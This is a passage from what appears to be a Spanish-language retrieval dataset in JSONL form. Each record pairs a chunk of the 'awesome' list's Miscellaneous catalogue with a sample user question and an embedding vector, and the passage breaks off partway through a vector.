β€” Tools for every platform. Captcha β€” A type of challenge–response test used in computing to determine whether or not the user is human. Jupyter β€” Create and share documents that contain code, equations, visualizations and narrative text. FIRST Robotics Competition β€” International high school robotics championship. Speakers β€” Conference and meetup speakers in the programming and design community. Board Games β€” Table-top gaming fun for all. Software Patreons β€” Fund individual programmers or the development of open source projects. Parasite β€” Parasites and host-pathogen interactions. Food β€” Projects on GitHub related to food.", "indexar": "con quΓ© puedo diseΓ±ar experiencias mΓ‘s consistentes en mi proyecto?", "v": [0.2048, 0.14218, -0.23836, -0.02606, 0.13583, -0.00931, -0.02541, -0.04243, -0.06048, -0.12649, -0.04622, 0.07087, -0.07392, -0.11995, 0.01129, 0.0215, 0.14091, 0.03651, -0.03439, 0.01979, 0.02356, -0.08826, -0.08319, -0.01253, 0.03154, -0.07002, 0.04023, -0.02488, 0.01968, 0.0791, 0.04554, 0.08131, 0.09903, -0.0489, -0.00623, -0.10948, -0.04326, 0.05345, 0.04814, -0.08181, 0.00883, -0.03424, 0.04696, 0.0561, 0.04579, -0.04663, -0.00995, -0.04721, -0.0782, -0.00013, -0.10489, 0.10338, -0.01041, 0.09464, 0.11595, 0.01409, 0.11327, -0.07396, 0.0524, 0.00079, 0.02321, -0.05309, 0.09619, -0.04134, 0.09159, -0.09379, -0.03983, -0.07426, -0.04736, -0.00104, -0.00158, 0.06038, 0.03766, -0.15905, 0.09672, 0.01458, 0.0379, -0.04828, 0.04246, -0.01567, 0.00531, -0.02159, -0.08562, -0.01053, 0.07002, 0.02069, -0.051, -0.0755, 0.05172, 0.05772, -0.00774, -0.04257, -0.03125, -0.0005, -0.12084, -0.02478, 0.19053, 0.05427, 0.09996, -0.05081, -0.09475, -0.0598, -0.07261, 0.0293, 0.01803, 0.01846, 0.04845, 0.02156, 0.02522, -0.00868, -0.07298, 0.00552, 0.00638, -0.0812, -0.08452, -0.05545, -0.05468, -0.02943, -0.0009, -0.00244, -0.01353, 0.0191, 0.01424, 0.04329, 0.02361, 0.04718, -0.09478, 0.06636, -0.02459, 0.01356, -0.02006, 0.03549, -0.04679, 0.04437, 0.01374, 0.08128, 0.02774, -0.00925, 0.01574, 0.00207, -0.00063, 0.09037, -0.0346, 0.00304, -0.03273, 0.04313, 0.00697, -0.03624, -0.0114, 0.00948, -0.04922, 0.05063, 0.07151, 0.00335, -0.10405, 0.01278, 0.02251, -0.0329, 0.01673, 0.09681, -0.0777, 0.09182, 0.02524, 0.09151, 0.08461, -0.05851, -0.03502, -0.04111, 0.10081, 0.05156, -0.00341, 0.01671, -0.01965, -0.02829, 0.07412, -0.06174, 0.00201, -0.11934, -0.00879, -0.06029, -0.06638, 0.10169, -0.04925, 0.01061, 0.02166, -0.10646, -0.00128, 0.08227, 0.04492, 0.04842, -0.07011, 0.07399, 0.0198, 0.00899, 0.00665, -0.07383, 0.08497, -0.02681, -0.05105, 0.0012, -0.00702, -0.0339, 0.02314, -0.02171, -0.00221, 0.01655, -0.05451, 0.09764, -0.03199, 0.09572, 0.07198, -0.03071, 0.05873, -0.06823, -0.02263, 0.09015, 0.07137, -0.00974, 0.08862, 0.00886, 0.02028, 0.00541, 0.04506, -0.01763, 0.04886, -0.00368, 0.05531, 0.00965, -0.02563, 0.04358, 0.05594, -0.00589, -0.07363, 0.00925, 0.02851, 0.03657, 0.00846, -0.01372, -0.05385, -0.05087, 0.02754, 0.14079, -0.03896, -0.0184, 0.06246, -0.10252, -0.06265, 0.00579, -0.07342, -0.07166, -0.08541, 0.09266, 0.08697, -0.07405, 0.02341, -0.01037]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Bitcoin Payment Processors β€” Start accepting Bitcoin. Scientific Computing β€” Solving complex scientific problems using computers. Amazon Sellers. Agriculture β€” Open source technology for farming and gardening. Product Design β€” Design a product from the initial concept to production. Prisma β€” Turn your database into a GraphQL API. Software Architecture β€” The discipline of designing and building software. Connectivity Data and Reports β€” Better understand who has access to telecommunication and internet infrastructure and on what terms. Stacks β€” Tech stacks for building different apps and features. Cytodata β€” Image-based profiling of biological phenotypes for computational biologists. IRC β€” Open source messaging protocol. Advertising β€” Programmatic media and ad tech for websites. Earth β€” Find ways to resolve the climate crisis. Naming β€” Guides for naming things in computer science. Web Archiving β€” An effort to preserve the Web for future generations. WP-CLI β€” Command-line interface for WordPress.", "indexar": "quΓ© herramienta sirve para aceptar pagos en Bitcoin", "v": [-0.0087, 0.07775, -0.14517, -0.07575, 0.07982, -0.21909, 0.03573, -0.12695, -0.11431, -0.07908, -0.02658, -0.03808, 0.0661, 0.07903, 0.012, -0.03408, -0.02795, -0.0181, 0.0512, -0.02556, 0.10564, -0.03795, -0.01625, -0.08324, -0.01673, 0.13093, 0.02063, 0.04524, -0.17774, 0.22495, 0.13186, -0.10344, -0.004, -0.02399, -0.08118, -0.01132, -0.04926, 0.03224, 0.0274, 0.00985, 0.04533, 0.01766, 0.0662, 0.04972, -0.05212, -0.04926, 0.03213, 0.09607, 0.00702, -0.02412, -0.03835, -0.12566, -0.12795, 0.00834, -0.05638, -0.03985, 0.14687, -0.2058, 0.02776, -0.05878, -0.1744, 0.10228, 0.04425, -0.02731, -0.06129, 0.02209, 0.00322, 0.08396, -0.03824, 0.06507, -0.02796, 0.04412, 0.07986, 0.00798, -0.00771, 0.03689, -0.0271, -0.00908, -0.0149, -0.05543, 0.04067, 0.01537, -0.14847, 0.13586, -0.07827, -0.01122, 0.06214, -0.10805, 0.0315, -0.03469, -0.05607, 0.12861, 0.03928, -0.0241, 0.07369, 0.08621, -0.00982, -0.07596, 0.02013, 0.03278, 0.07374, -0.10545, -0.07868, 0.04381, -0.02612, 0.09844, 0.02475, -0.0166, -0.03869, -0.05904, 0.08137, 0.01064, -0.06836, 0.08914, -0.0767, 0.03321, -0.02034, -0.01001, 0.0021, -0.02134, 0.00879, 0.04603, -0.06187, -0.02788, 0.05442, -0.0014, -0.04202, 0.12781, -0.00574, -0.07972, -0.00529, 0.01131, -0.08302, 0.04884, -0.00363, -0.0303, 0.09259, -0.07091, 0.01345, -0.03222, 0.11739, 0.02428, -0.04529, -0.06158, 0.0894, 0.01094, 0.05964, -0.02238, -0.08321, -0.04706, 0.07164, -0.07384, -0.04416, -0.03217, -0.1013, -0.07513, -0.01246, -0.02735, -0.11763, 0.05602, -0.03295, -0.03867, 0.0978, 0.00352, -0.06537, -0.01556, 0.03987, 0.03583, 0.00685, 0.08488, 0.04876, 0.03358, 0.00176, -0.00742, 0.01235, -0.11769, -0.06765, -0.05515, 0.0435, -0.06881, -0.02513, -0.01096, -0.0209, -0.03369, 0.02159, -0.0219, 0.02413, 0.05498, -0.04505, 0.04989, -0.00809, 0.00915, -0.03006, -0.05274, 0.01009, -0.00711, -0.02169, -0.0435, -0.03239, 0.01949, 0.02207, 0.05407, 0.00712, -0.0211, -0.02058, 0.07972, -0.08873, -0.01747, -0.01311, 0.00134, 0.05359, -0.0309, 0.00888, -0.01079, 0.01922, -0.04965, 0.00735, 0.07862, -0.02406, 0.04867, -0.00999, -0.03046, -0.03051, -0.0415, 0.03163, 0.05285, 0.00992, 0.02015, -0.02665, -0.01666, 0.02208, 0.00066, -0.08576, 0.00483, -0.02154, -0.03544, 0.0385, -0.0013, -0.07596, 2e-05, 0.00906, 0.01319, 0.00629, -0.02404, -0.02204, -0.01448, 0.01473, -0.03952, -0.08662, -0.04611, -0.04415, 0.01201, 0.08536, 0.02586, 0.04408, 0.01458]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Bitcoin Payment Processors β€” Start accepting Bitcoin. Scientific Computing β€” Solving complex scientific problems using computers. Amazon Sellers. Agriculture β€” Open source technology for farming and gardening. Product Design β€” Design a product from the initial concept to production. Prisma β€” Turn your database into a GraphQL API. Software Architecture β€” The discipline of designing and building software. Connectivity Data and Reports β€” Better understand who has access to telecommunication and internet infrastructure and on what terms. Stacks β€” Tech stacks for building different apps and features. Cytodata β€” Image-based profiling of biological phenotypes for computational biologists. IRC β€” Open source messaging protocol. Advertising β€” Programmatic media and ad tech for websites. Earth β€” Find ways to resolve the climate crisis. Naming β€” Guides for naming things in computer science. Web Archiving β€” An effort to preserve the Web for future generations. WP-CLI β€” Command-line interface for WordPress.", "indexar": "con quΓ© puedo montar un servidor de mensajerΓ­a open source", "v": [0.01062, 0.07596, -0.13561, -0.14522, -0.20246, -0.0955, -0.02508, -0.03365, -0.06163, -0.13804, -0.1144, -0.03293, 0.15278, -0.05783, 0.00148, 0.12587, 0.21197, 0.00252, 0.07122, 0.03543, 0.07122, -0.00776, -0.02348, -0.107, -0.0522, 0.04996, 0.05381, -0.087, -0.07202, 0.0028, 0.04635, -0.02763, 0.10605, 0.04872, 0.01447, 0.01575, 0.01645, 0.08275, -0.00966, -0.00465, 0.07864, -0.00847, -0.06521, 0.0812, -0.01644, -0.06705, 0.06095, -0.05303, 0.0263, 0.01118, -0.00524, -0.08822, -0.14446, 0.01514, -0.06036, 0.11507, 0.15096, -0.10588, 0.10864, -0.03729, -0.06934, 0.10505, -0.05257, -0.06133, 0.02423, -0.05694, -0.01953, -0.02049, -0.16728, -0.04608, -0.02888, -0.05761, -0.02951, 0.04406, -0.0055, 0.09888, -0.11898, 0.05074, -0.01861, 0.17884, 0.04713, -0.03769, 0.01064, 0.04667, -0.02635, -0.09536, -0.00822, -0.05245, 0.04494, -0.01836, 0.1021, 0.09471, -0.08453, 0.10776, 0.02883, -0.09798, -0.01461, -0.03574, -0.03575, 0.0704, -0.00025, 0.01685, -0.01788, 0.10276, 0.03458, 0.01298, 0.09775, -0.1205, 0.07586, -0.02174, 0.07753, -0.05396, 0.00475, 0.05203, -0.07603, -0.16843, 0.01124, 0.05472, 0.03331, 0.01456, -0.09978, 0.04461, 0.07737, 0.08993, 0.03818, -0.02759, 0.0914, 0.0647, -0.02736, -0.00227, -0.03418, -0.0772, -0.03644, -0.02713, 0.00412, 0.02403, 0.04156, -0.03779, -0.00795, 0.03998, -0.00932, -0.00344, -0.01674, -0.02866, 0.0817, 0.04388, 0.02409, -0.15551, -0.0699, 0.0066, 0.09394, 0.00814, -0.03996, -0.03172, -0.09307, -0.02226, 0.06523, -0.03227, -0.01712, 0.09233, 0.03805, 0.07353, -0.05612, 0.0787, 0.01708, -0.04091, 0.01069, 0.07268, 0.03772, 0.04125, -0.05811, 0.02002, 0.0324, -0.02152, 0.01083, -0.01882, -0.06815, -0.04601, -0.0309, -0.02829, 0.0023, 0.02685, 0.0266, 0.02818, -0.00284, 0.0154, -0.01517, -0.03571, 0.00941, 0.05219, 0.01631, 0.03642, -0.06871, 0.0228, 0.04196, -0.07657, -0.03475, -0.02078, -0.00346, 0.0173, -0.02967, -0.04866, -0.02293, -0.03003, -0.03353, -0.02639, -0.07449, 0.0493, -0.00348, 0.03238, 0.01471, -0.03689, 0.09704, -0.052, 0.00509, 0.0293, 0.05696, -0.04207, -0.00337, 0.00768, -0.02683, 0.03894, 0.01231, -0.05149, 0.00108, 0.05546, -0.00275, 0.01026, 0.0998, 0.04067, -0.04743, 0.03639, -0.08655, -0.00082, 0.05349, -0.04451, -0.00549, -0.03083, -0.01178, -0.04878, 0.00325, 0.05878, 0.0064, -0.02607, 0.02301, -0.05783, -0.02441, 0.00403, -0.07755, -0.05019, -0.05389, -0.01377, -0.01468, -0.02976, -0.01562, -0.06043]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Bitcoin Payment Processors β€” Start accepting Bitcoin. Scientific Computing β€” Solving complex scientific problems using computers. Amazon Sellers. Agriculture β€” Open source technology for farming and gardening. Product Design β€” Design a product from the initial concept to production. Prisma β€” Turn your database into a GraphQL API. Software Architecture β€” The discipline of designing and building software. Connectivity Data and Reports β€” Better understand who has access to telecommunication and internet infrastructure and on what terms. Stacks β€” Tech stacks for building different apps and features. Cytodata β€” Image-based profiling of biological phenotypes for computational biologists. IRC β€” Open source messaging protocol. Advertising β€” Programmatic media and ad tech for websites. Earth β€” Find ways to resolve the climate crisis. Naming β€” Guides for naming things in computer science. Web Archiving β€” An effort to preserve the Web for future generations. WP-CLI β€” Command-line interface for WordPress.", "indexar": "cuΓ‘l es una alternativa libre a las herramientas para anΓ‘lisis biolΓ³gico basado en imΓ‘genes", "v": [0.11007, 0.10189, -0.01244, -0.0055, -0.12931, -0.10886, -0.08238, -0.07022, -0.10844, -0.09763, 0.03584, -0.18647, -0.11536, 0.09031, 0.15395, -0.05419, -0.02645, -0.15946, 0.03207, -0.04579, -0.02691, 0.02442, -0.16558, 0.05104, 0.0064, -0.07864, -0.02423, 0.0065, -0.105, 0.16952, 0.01567, 0.05534, 0.12812, -0.02113, -0.07249, -0.05349, 0.06846, 0.01555, -0.00825, -0.03664, -0.06293, -0.11727, 0.0075, 0.09313, -0.04771, -0.06463, -0.1075, 0.00058, -0.02792, 0.07162, 0.01282, -0.0618, -0.11049, 0.0247, 0.02349, -0.19132, 0.19068, -0.15679, 0.05517, -0.08461, 0.00889, 0.1477, 0.07012, 0.01708, -0.03937, -0.00927, -0.05121, 0.00185, -0.05822, 0.10149, 0.0896, -0.0385, 0.04515, -0.01861, -0.11591, 0.00182, -0.05948, 0.08264, -0.04144, -0.024, 0.07718, -0.02821, -0.07594, 0.06872, -0.0711, -0.06368, 0.04742, -0.04196, 0.02113, -0.09114, 0.03423, 0.00046, 0.0385, 0.08818, 0.01953, 0.00401, -0.03045, 0.03235, 0.03184, 0.06096, 0.09606, -0.06369, -0.07039, -0.0518, 0.02797, 0.01264, 0.01334, 0.00188, -0.1955, -0.0105, -0.02404, 0.04641, 0.03207, 0.00924, -0.08215, 0.00833, -0.01414, 0.02266, -0.00681, -0.04575, 0.05756, 0.08009, -0.07472, -0.05111, -0.0234, -0.01159, 0.04557, 0.00354, -0.00039, 0.02755, -0.01484, 0.04153, -0.09048, -0.09466, -0.0909, -0.02797, 0.07166, -0.07606, -0.07817, -0.05344, -0.02424, 0.11346, 0.00348, -0.06512, 0.05492, 0.00867, -0.02859, -0.08496, -0.0713, 0.0083, -0.0336, -0.01421, 0.03605, 0.04527, -0.01078, 0.03316, -0.11399, -0.02394, -0.09104, 0.02593, -0.02742, -0.04658, 0.01808, 0.01985, -0.00287, -0.01417, -0.02054, -0.07881, -0.08413, 0.00406, 0.0727, 0.04213, -0.01152, -0.08439, 0.06666, -0.0105, 0.01507, -0.12793, -0.00053, -0.03079, -0.01101, 0.02804, -0.06564, -0.02328, 0.055, -0.01245, -0.00438, 0.03157, 0.01323, 0.06075, 0.00172, 0.0289, -0.032, -0.01423, 0.05967, -0.01102, -0.01192, -0.02093, -0.0067, -0.01958, -0.03146, -0.01835, -0.01778, -0.03017, -0.04011, 0.02529, -0.03069, 0.03191, -0.04117, 0.01732, -0.04389, -0.00878, 0.07966, -0.05453, -0.02217, 0.00119, 0.00288, -0.0302, -0.01695, -0.01821, 0.04997, 0.0989, 0.07039, 0.05734, -0.0291, 0.05524, -0.02318, -0.00902, 0.01371, -0.04499, 0.02614, 0.03992, -0.01877, 0.03704, 0.00646, -0.03959, -0.00745, -0.00312, -0.02045, -0.04229, 0.0874, 0.02776, -0.06991, 0.00908, -0.07552, 0.01382, -0.05579, -0.04388, -0.00331, -0.08321, -0.02067, 0.05206, 0.04115, -0.02949, -0.00237, 0.00761]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Credit Modeling β€” Methods for classifying credit applicants into risk classes. Ansible β€” A Python-based, open-source IT configuration management and automation platform. Biological Visualizations β€” Interactive visualization of biological data on the web. QR Code β€” A type of matrix barcode that can be used to store and share a small amount of information. Veganism β€” Making the plant-based lifestyle easy and accessible. Translations β€” The transfer of the meaning of a text from one language to another. Scriptable β€” An iOS app for automation in JavaScript. WebXR β€” Enables immersive virtual reality and augmented reality content on the web. Computational Geometry β€” Computational approaches for problems in geometry. OpenStreetMap β€” An open data mapping project utilized by many apps and devices. Computational Biology β€” Computational approaches applied to problems in biology. Read the Docs β€” Example documentation projects to inspire and help bootstrap new documentation projects.", "indexar": "que programa me ayuda a modelar el riesgo crediticio?", "v": [0.05782, 0.06125, -0.01323, -0.09846, 0.19016, -0.14163, 0.07926, 0.03076, -0.16288, -0.08342, 0.00357, -0.08584, 0.01396, -0.11198, -0.00702, -0.06262, -0.03847, 0.03317, 0.06432, -0.08095, 0.16516, -0.14463, -0.00358, -0.00271, 0.01449, 0.07099, 0.05754, -0.08202, -0.02538, 0.04453, 0.03513, -0.06505, 0.13875, -0.03551, -0.00796, 0.08854, 0.0061, -0.07355, -0.02728, 0.05289, 0.13113, -0.05358, 0.03578, -0.1032, 0.1671, -0.06773, 0.00523, 0.02189, 0.02056, -0.04793, 0.03802, -0.10164, -0.04123, -0.06279, 0.08733, 0.04378, 0.03527, -0.04114, -0.16399, -0.0559, 0.11547, 0.04896, 0.00683, 0.01345, -0.04106, 0.00278, 0.02457, -0.01365, -0.12555, 0.03087, -0.08037, -0.03333, 0.05922, -0.02851, -0.03234, -0.0772, 0.02164, 0.0033, 0.02519, -0.14572, 0.0187, 0.05531, 0.07149, 0.09425, -0.08249, 0.0341, 0.04705, 0.0376, -0.01164, -0.05014, 0.03767, 0.04621, -0.03012, 0.04006, -0.04299, -0.03803, 0.09317, 0.01032, 0.07383, -0.04248, 0.03182, -0.05773, -0.08279, -0.00243, -0.0107, 0.03056, 0.09273, -0.04524, -0.15074, 0.03358, -0.02826, 0.10128, -0.02615, -0.10228, -0.05869, 0.04732, 0.03174, 0.01256, 0.09201, -0.10262, -0.02366, 0.0587, -0.02722, 0.06559, -0.02269, -0.02612, -0.04757, 0.09388, -0.00877, 0.08613, -0.10439, 0.04083, -0.05751, -0.07527, -0.01279, -0.01793, 0.02772, -0.03372, -0.05175, -0.07113, 0.08733, 0.06626, 0.06005, -0.03355, -0.06249, -0.05413, 0.07034, -0.10761, -0.0122, 0.02179, 0.00068, 0.13836, -0.03057, 0.0399, -0.07897, -0.01433, 0.08792, 0.04562, 0.02027, 0.00745, 0.02289, 0.00405, 0.04304, -0.07853, 0.01642, -0.00557, 0.05806, -0.01108, 0.0324, 0.01884, 0.00643, -0.02284, 0.0071, 0.02006, 0.04344, -0.0222, 0.00734, -0.0901, -0.00013, -0.02189, -0.14548, 0.03967, 0.06292, 0.02931, -0.00263, -0.04692, 0.02806, -0.00934, 0.06573, 0.02707, 0.01202, 0.0682, -0.06473, 0.01096, -0.00629, 0.03077, 0.01877, -0.00014, 0.10589, -0.03621, -0.07875, -0.03805, -0.04507, -0.05038, 0.07603, 0.06733, -0.05403, 0.0828, 0.01798, 0.11078, 0.00103, -0.0327, 0.14113, -0.00124, -0.00953, -0.00789, -0.04252, 0.09011, -0.01594, 0.01255, 0.01405, -0.02013, 0.08513, 0.09866, 0.03019, -0.05961, 0.02417, 0.00462, 0.02359, 0.03761, 0.00927, -0.06145, -0.01286, -0.09185, 0.09019, 0.01744, 0.05501, -0.02143, 0.00242, -0.04823, 0.00087, 0.05495, -0.00495, -0.07688, 0.03586, 0.02689, -0.06808, -0.0396, 0.00156, 0.01952, 0.01888, 0.07818, 0.01035, -0.06865, 0.05658, -0.00312]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Credit Modeling β€” Methods for classifying credit applicants into risk classes. Ansible β€” A Python-based, open-source IT configuration management and automation platform. Biological Visualizations β€” Interactive visualization of biological data on the web. QR Code β€” A type of matrix barcode that can be used to store and share a small amount of information. Veganism β€” Making the plant-based lifestyle easy and accessible. Translations β€” The transfer of the meaning of a text from one language to another. Scriptable β€” An iOS app for automation in JavaScript. WebXR β€” Enables immersive virtual reality and augmented reality content on the web. Computational Geometry β€” Computational approaches for problems in geometry. OpenStreetMap β€” An open data mapping project utilized by many apps and devices. Computational Biology β€” Computational approaches applied to problems in biology. Read the Docs β€” Example documentation projects to inspire and help bootstrap new documentation projects.", "indexar": "cΓ³mo puedo visualizar datos biolΓ³gicos de forma interactiva en la web?", "v": [0.1668, 0.14714, -0.0542, 0.02978, 0.09951, -0.04998, -0.04613, -0.08297, -0.03619, -0.10974, 0.10683, -0.17395, -0.04038, 0.0047, 0.07042, 0.00356, 0.09318, -0.13083, -0.05365, -0.12091, 0.02996, -0.03568, -0.11185, 0.05703, -0.03375, -0.05158, -0.01193, 0.00215, -0.00391, 0.16963, 0.02051, 0.00907, -0.01795, 0.03926, -0.08056, 0.06573, -0.03609, 0.07119, -0.01404, -0.15453, -0.1028, -0.05291, -0.02549, 0.0535, 0.01642, 0.07188, -0.11099, -0.06313, -0.0425, -0.04388, -0.0197, 0.04434, -0.14631, -0.06214, -0.09709, -0.14158, 0.11657, -0.18229, 0.11395, -0.02865, 0.04193, 0.11614, 0.04018, 0.02566, -0.00994, -0.01711, 0.02478, 0.03351, -0.03961, 0.08552, 0.05537, -0.00869, -0.0033, -0.03282, 0.06443, 0.05397, 0.07169, 0.07342, 0.09844, 0.01474, -0.01889, 0.02562, -0.03574, 0.03099, -0.02011, 0.02566, -0.01559, -0.02997, -0.02458, -0.18831, 0.1047, 0.01297, 0.04006, -0.00187, -0.02668, -0.00509, -0.0173, -0.00417, -0.03522, 0.01922, -0.07895, 0.09107, -0.12064, 0.05577, 0.07499, 0.05191, -0.00091, 0.02051, -0.1066, -0.01123, -0.05935, -0.02676, -0.07345, -0.07173, 0.00581, 0.09463, -0.0229, 0.03923, -0.02507, -0.02891, -0.05851, 0.03356, 0.01608, -0.05029, 0.00642, 0.00219, -0.05078, 0.03684, 0.00251, 0.06121, -0.04254, 0.00715, -0.00279, -0.05625, 0.0961, 0.02287, -0.08438, -0.05725, 0.00939, -0.02169, 0.05968, 0.06421, -0.03197, -0.00935, 0.00829, -0.06133, 0.01608, -0.00133, -0.14938, 0.01885, -0.02247, 0.02084, 0.02192, 0.04315, -0.07033, 0.05173, -0.04926, -0.06186, -0.03125, -0.0048, -0.07199, 0.05076, -0.01734, 0.04853, -0.0306, 0.00162, -0.0766, -0.06173, -0.01146, -0.02526, -0.01376, 0.05445, 0.00844, -0.14071, -0.00462, 0.04137, -0.06764, -0.03938, 0.07503, -0.09332, 0.00671, -0.00755, -0.06035, -0.07624, -0.05095, -0.02982, -0.01052, -0.02159, -0.05711, 0.05437, 0.0555, 0.1337, -0.00064, 0.07804, 0.07598, -0.05287, -0.03631, 0.07984, 0.02699, -0.04677, 0.02756, 0.00912, 0.0105, -0.00755, -0.01677, 0.10577, -0.01649, -0.01387, -0.00908, -0.00265, -0.03398, -0.08057, 0.11816, -0.05458, -0.03351, -0.06603, 0.04761, -0.06491, -0.00374, 0.02398, 0.02155, 0.07309, 0.09889, -0.00995, 0.0232, -0.02293, 0.04579, -0.02382, 0.04049, -0.0044, -0.05959, 0.00339, 0.04476, 0.02689, 0.06792, -0.02883, -0.03162, -0.06659, -0.07348, -0.04915, 0.03723, 0.06042, -0.0243, -0.01716, 0.02943, -0.08338, -0.10473, 0.01898, 0.03481, -0.08524, -0.06705, -0.05839, 0.01546, -0.00712, -0.0563, -0.01816]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Credit Modeling β€” Methods for classifying credit applicants into risk classes. Ansible β€” A Python-based, open-source IT configuration management and automation platform. Biological Visualizations β€” Interactive visualization of biological data on the web. QR Code β€” A type of matrix barcode that can be used to store and share a small amount of information. Veganism β€” Making the plant-based lifestyle easy and accessible. Translations β€” The transfer of the meaning of a text from one language to another. Scriptable β€” An iOS app for automation in JavaScript. WebXR β€” Enables immersive virtual reality and augmented reality content on the web. Computational Geometry β€” Computational approaches for problems in geometry. OpenStreetMap β€” An open data mapping project utilized by many apps and devices. Computational Biology β€” Computational approaches applied to problems in biology. Read the Docs β€” Example documentation projects to inspire and help bootstrap new documentation projects.", "indexar": "quΓ© aplicaciΓ³n mΓ³vil permite automatizar tareas con JavaScript?", "v": [-0.1514, 0.13362, -0.07123, -0.27434, 0.03452, 0.00246, -0.11049, 0.01983, -0.01116, 0.07521, -0.11332, -0.13969, 0.07716, 0.05768, 0.10454, -0.01194, 0.12669, -0.08055, 0.03121, 0.07832, 0.01304, -0.01831, -0.13104, -0.14168, -0.12667, 0.13525, -0.01204, -0.01093, -0.22285, 0.0094, -0.02065, -0.05671, 0.11848, -0.07145, -0.03944, -0.00657, 0.06721, 0.04566, -0.02158, -0.00794, 0.07662, 0.06884, -0.15147, 0.06309, 0.0477, 0.04852, 0.09404, -0.02292, -0.08499, -0.00504, 0.0666, -0.01039, -0.03848, 0.04667, -0.0785, 0.04075, 0.17542, -0.11731, 0.03818, -0.055, 0.01304, 0.03221, -0.11503, 0.05889, 0.05752, -0.0567, 0.15023, 0.12919, 0.02324, 0.05704, 0.08289, 0.04698, -0.05452, 0.04128, 0.0631, 0.03231, -0.17677, -0.0531, 0.01222, 0.0644, -0.01754, 0.00438, -0.05714, 0.03214, 0.02599, 0.01671, 0.04744, 0.02745, 0.04565, -0.09034, 0.02366, 0.0105, -0.00406, 0.0198, 0.02675, -0.01788, 0.03159, -0.00659, 0.06434, 0.07453, 0.03938, -0.13782, -0.05133, 0.00984, 0.00576, 0.03149, 0.02689, 0.00508, -0.02584, -0.0366, 0.02695, -0.08159, 0.00957, 0.03863, 0.00399, 0.03012, 0.02988, -0.0256, -0.03267, -0.09947, -0.00379, 0.03936, 0.07377, -0.09111, 0.12327, -0.01138, 0.08285, 0.16927, 0.01716, -0.03319, 0.05862, -0.01477, -0.10912, 0.03449, 0.00806, 0.06143, 0.11485, -0.02114, -0.06305, 0.00814, -0.04999, 0.03461, 0.02382, -0.03018, 0.07966, 0.05936, 0.01907, 0.03232, 0.0441, 0.04048, 0.04186, -0.09536, -0.02943, 0.00108, -0.0231, -0.01094, -0.04083, -0.00293, -0.01703, 0.03529, -0.00438, -0.03638, -0.07463, 0.0001, -0.06826, -0.08253, 0.04711, 0.01142, 0.04969, 0.04806, -0.0019, 0.03755, 0.07218, -0.03644, -0.0079, -0.01223, 0.04788, 0.04252, 0.0293, -0.0337, 0.00145, -0.00864, 0.06879, -0.03682, 0.04216, -0.04081, -0.01871, -0.02711, -0.02381, 0.00073, -0.07542, 0.0598, 0.00632, -0.03544, 0.07597, 0.0053, -0.02736, -0.04606, -0.00868, 0.01436, -0.01251, -0.02414, -0.00122, 0.01921, -0.02758, 0.03376, 0.05871, 0.0449, -0.0124, -0.00399, -0.00685, 0.00315, 0.03386, 0.09018, 0.00252, -0.01862, -0.04351, 0.02119, 0.00512, -0.03075, -0.0118, -0.07265, 0.02183, -0.01101, 0.03254, 0.07594, 0.05523, 0.02531, 0.0019, -0.04851, -0.03195, -0.06267, -0.0017, 0.0041, 0.00937, -0.01113, -0.01021, 0.02064, -0.02178, -0.0546, -0.02747, 0.04985, 0.02429, -0.02335, -0.13214, -0.01054, -0.03765, 0.00975, -0.04739, -0.01974, -0.06191, 0.0095, -0.00881, -0.02103, 0.01564, 0.03608]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Quarto β€” Scientific and technical open-source publishing system built on Pandoc. Biological Image Analysis β€” Interpreting biological phenomena using images. ChatGPT β€” Artificial intelligence chatbot developed by OpenAI. Whisper β€” Open-source AI-powered speech recognition system developed by OpenAI. Stock Trading β€” Purchase and sale of equities of publicly traded companies to generate profits. Steam Deck β€” A handheld gaming computer developed by Valve. Astrophotography β€” Photography of astronomical objects, celestial events, or areas of the night sky. HPC β€” High Performance Computing. Geocaching β€” Outdoor treasure-hunting activity that uses GPS-enabled devices. Regex β€” Specialized language for matching patterns in text. Event-Driven Architecture β€” A software architecture approach where services collaborate by publishing and subscribing to events. Permacomputing β€” Resilient and regenerative computing practices inspired by permaculture.", "indexar": "que programa hay para publicar documentos cientΓ­ficos y tΓ©cnicos de forma abierta?", "v": [-0.0356, 0.03549, -0.07413, -0.22426, 0.09723, -0.18211, 0.04583, -0.07899, -0.08495, -0.09896, -0.04033, -0.04873, 0.02049, -0.06486, 0.07444, -0.04175, 0.14266, -0.16357, 0.0917, 0.00966, -0.06872, -0.0261, -0.04108, -0.04414, -0.02295, -0.09262, -0.02454, -0.10996, 0.04078, 0.05045, 0.0631, 0.09639, -0.02758, 0.0013, -0.06206, 0.09488, 0.04005, -0.07868, -0.04905, 0.09989, -0.08641, -0.09658, -0.08711, 0.024, 0.00503, 